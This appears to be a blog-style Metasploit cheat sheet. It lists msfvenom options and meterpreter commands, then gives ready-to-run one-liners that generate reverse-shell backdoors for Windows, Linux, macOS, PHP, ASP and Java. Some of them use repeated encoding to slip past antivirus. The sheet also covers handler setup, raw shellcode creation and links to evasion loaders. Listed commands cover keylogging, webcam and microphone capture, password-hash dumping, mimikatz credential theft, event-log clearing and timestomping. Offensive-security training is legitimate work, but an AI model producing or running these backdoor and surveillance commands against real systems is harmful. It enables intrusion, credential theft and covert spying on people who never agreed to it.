
Metasploit Framework

Metasploit is an open-source security vulnerability detection tool that helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments, providing real security-risk intelligence. Its features include smart exploitation, code auditing, web application scanning and social engineering. Teams collaborate inside Metasploit and present their findings in consolidated reports.

Installation

apt install postgresql installs PostgreSQL, which msf uses for its database.

Download the Ubuntu package from https://apt.metasploit.com/ and install it with `apt install`.

Common modules

(screenshot not reproduced)

Common commands

(screenshot not reproduced)

Common msfvenom options

-p, --payload        Specify the payload
--list payloads      List the payloads that can be set
-l, --list           List available items
-n, --nopsled        Specify the size of the NOP sled in the payload
-f, --format         Specify the output file format
--list formats       List available output formats
-e, --encoder        Specify the encoder to use
--list encoders      List available encoders
-a, --arch           Specify the target architecture
--platform           Specify the target platform
--list platforms     List available target platforms
-s, --space          Maximum length of the unencoded payload
--encoder-space      Maximum length of the encoded payload
-b, --bad-chars      Characters that must not appear in the payload
-i, --iterations     Number of times to encode the payload
-c, --add-code       Include an additional win32 shellcode file
-x, --template       Use a specific executable file as the template
-k, --keep           Preserve the template program's functionality; the injected payload runs as a new process
-o, --out            Save the payload to a file
-v, --var-name       Specify a custom variable name

Generating a payload quickly with msfvenom and connecting to it

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.160.130 lport=4444 -f exe -o shell.exe

Bind (forward) connection

msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f exe -o bind.exe
handler -H 192.168.172.143 -p windows/x64/meterpreter/bind_tcp -P 4444

Quick listener

handler -H 0.0.0.0 -P 4444 -p windows/meterpreter/reverse_tcp

Starting the handler module and setting the payload type (it must match the payload the file was generated with)

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
run -j -z

Common MSF commands

sessions                   List all sessions
sessions <id>              Interact with the session with the given id
background / bg            Send the current session to the background
bgkill                     Kill a background session
bglist                     List all background sessions
bgrun                      Run a meterpreter script
channel                    Display the controlled channels
close                      Close the specified channel
detach                     Detach the meterpreter session (http/https transports)
disable_unicode_encoding   Disable Unicode encoding
enable_unicode_encoding    Enable Unicode encoding
exit                       Terminate the meterpreter session
get_timeouts               Get the current session's timeout values
guid                       Get the current session's GUID
info                       Show information about a module
irb                        Open a Ruby shell inside the current session
load                       Load a meterpreter extension, e.g. load incognito
machine_id                 Get the machine id of the session host
migrate                    Inject into / migrate to another process
pivot                      Manage pivot listeners
read                       Read data from a session channel
resource                   Run the commands stored in a file
run                        Run a module
secure                     Encrypt the session traffic
sessions                   List sessions
set_timeouts               Set the session timeout values
sleep                      Set the reconnect / heartbeat interval of the implant
ssl_verify                 SSL certificate verification setting
transport                  Manage the transport channel
use                        Use a module
uuid                       Get the current session's UUID
write                      Write data to a channel

Stdapi: File system Commands
============================

Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
del Delete the specified file
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcat Read the contents of a local file to the screen
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Port forwarding
resolve Resolve a set of host names on the target
route View and modify the routing table (shows directly reachable subnets)

Stdapi: System Commands
=======================

Command Description
------- -----------
clearev Clear the event log
drop_token Revert the token after it has been stolen with steal_token
execute Execute a command
    e.g. execute -cH -f 'potato.exe'
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Get the privileges of the current session
getsid Get the SID of the current user
getuid Get the UID of the current user
kill Terminate a process
localtime Displays the target system local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Revert to the original token
shell Drop into a system shell
shutdown Shuts down the remote computer
steal_token Steal a token from a process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreter's current desktop
uictl Control some of the user interface components


Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam

Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play Play a waveform audio file (.wav) on the target system

Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

Command Description
------- -----------
hashdump Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

Command Description
------- -----------
timestomp Manipulate file MACE attributes

Extensions and credential commands:

incognito #load the token-manipulation extension (load incognito)
kiwi #load the mimikatz extension (load kiwi)
creds_all #retrieve all credentials

Common backdoor generation commands

1. Windows
msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp -i 3 -e x86/shikata_ga_nai -f exe -o C:\back.exe
msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp -f exe -o C:\back.exe

2. Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf -o shell.elf

3. macOS
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

4. PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.153.138 LPORT=1520 -f raw > shell.php

5. ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

6. ASPX
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx

7. Java
msfvenom -p java/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f jar > shell.jar

Generating shellcode

For example, to generate shellcode in C format (-b '\x00' excludes the null byte as a bad character):

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b '\x00' lhost=192.168.186.130 lport=1250 -f c -o rev.c

Reverse-connection example:

Generate a raw-format shell with msf

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.186.130 lport=1234 -f raw -o shellcode.raw

Start the msf listener

handler -H 0.0.0.0 -P 4444 -p windows/meterpreter/reverse_tcp

Then run it on the target machine

shellcode_launcher.exe -i shellcode.raw

shellcode_launcher loaders

https://github.com/sh3d0ww01f/nim_shellloader

https://github.com/oddcod3/Phantom-Evasion

If you get the error module 'OpenSSL.crypto' has no attribute 'PKCS12Type', replace PKCS12Type with PKCS12 in Phantom-Evasion/Setup/Phantom_lib.py.

https://www.freebuf.com/sectool/192711.html